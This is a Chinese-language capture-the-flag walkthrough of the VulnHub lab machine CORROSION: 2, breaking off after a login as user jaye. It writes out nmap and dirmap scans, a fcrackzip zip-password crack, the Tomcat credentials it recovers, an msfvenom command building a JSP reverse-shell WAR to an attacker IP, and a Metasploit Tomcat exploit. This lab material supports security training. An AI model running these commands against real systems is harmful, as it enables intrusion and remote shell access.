vulnhub靶場之CORROSION: 2

準備:
攻擊機:虛擬機kali、本機win10 。
靶機:CORROSION: 2,網段地址我這里設置的橋接,所以與本機電腦在同一網段,下載地址:https://download.vulnhub.com/corrosion/Corrosion2.ova.torrent,下載后直接vbox打開即可 。
知識點:CVE-2021-4034漏洞利用、fcrackzip爆破zip文件密碼、tomcat獲取shell(知賬戶和密碼)、unshadow生成密碼本、john爆破密碼 。

vulnhub靶場之CORROSION: 2

文章插圖
信息收集:
通過nmap掃描下網段內的存活主機地址,確定下靶機的地址:nmap -sn 192.168.100.0/24,獲得靶機地址:192.168.100.244 。
vulnhub靶場之CORROSION: 2

文章插圖
掃描下開放的端口和對應的服務:nmap -T4 -sV -p- -A 192.168.100.244,顯示開放了22、80、8080端口,開啟了ssh服務、apache服務 。
vulnhub靶場之CORROSION: 2

文章插圖
使用dirmap進行目錄掃描,80端口未發現有用信息,但是在8080端口發現readme.txt、backup.zip等文件,掃描命令:python dirmap.py -i http://192.168.100.244:8080/ -lcf 。
vulnhub靶場之CORROSION: 2

文章插圖
訪問下80端口,在80端口的源代碼頁面中發現讓我們查看https://launchpad.net/bugs/1288690網頁 。
vulnhub靶場之CORROSION: 2

文章插圖

vulnhub靶場之CORROSION: 2

文章插圖
訪問下8080端口和端口的readme.txt文件,下載backup.zip文件進行解壓查看,但是需要密碼 。
vulnhub靶場之CORROSION: 2

文章插圖

vulnhub靶場之CORROSION: 2

文章插圖
信息利用:
使用zip密碼爆破工具(fcrackzip)進行密碼爆破,命令:fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip,獲得密碼:@administrator_hi5 。
vulnhub靶場之CORROSION: 2

文章插圖
在解壓的tomcat-users.xml文件中發現兩組賬戶和密碼:manager/melehifokivai、admin/melehifokivai 。
vulnhub靶場之CORROSION: 2

文章插圖
使用賬戶名和密碼在8080端口登錄 。
vulnhub靶場之CORROSION: 2

文章插圖
想著部署項目實現shell反彈,但是失敗了,war包生成命令:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.100.166 LPORT=6688 -f war -o upfine.war,在本地上傳部署后,訪問下該服務 。
vulnhub靶場之CORROSION: 2

文章插圖
shell獲取:
在msf中存在一個配合賬號和密碼獲取tomcat shell權限的exp 。
vulnhub靶場之CORROSION: 2

文章插圖
選擇該exp:use 6,設置下賬號、密碼、ip信息、端口信息,然后run即可 。
vulnhub靶場之CORROSION: 2

文章插圖

vulnhub靶場之CORROSION: 2

文章插圖
使用當前用戶在系統里查看下目錄信息和文件信息,在/home下發現兩個用戶文件夾,但是/jaye的文件夾無權限查看,在randy文件下下發現了note.txt和user.txt進行查看,獲得第一個flag 。
vulnhub靶場之CORROSION: 2

文章插圖
越權訪問:
在虛擬機的初始界面存在三個賬戶:jaye、randy、tomcat,發現jaye賬戶使用密碼:melehifokivai可以成功登錄或者使用xshell登錄 。
vulnhub靶場之CORROSION: 2

經驗總結擴展閱讀